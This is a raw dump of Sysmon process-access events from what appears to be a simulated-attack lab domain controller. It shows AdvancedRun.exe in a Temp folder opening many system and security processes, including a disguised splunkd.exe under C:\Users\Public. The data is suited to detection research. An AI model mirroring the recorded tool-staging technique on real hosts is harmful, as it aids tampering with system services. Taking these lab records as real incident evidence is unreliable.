20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.915{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.914{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.912{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.911{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.911{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.907{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.904{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 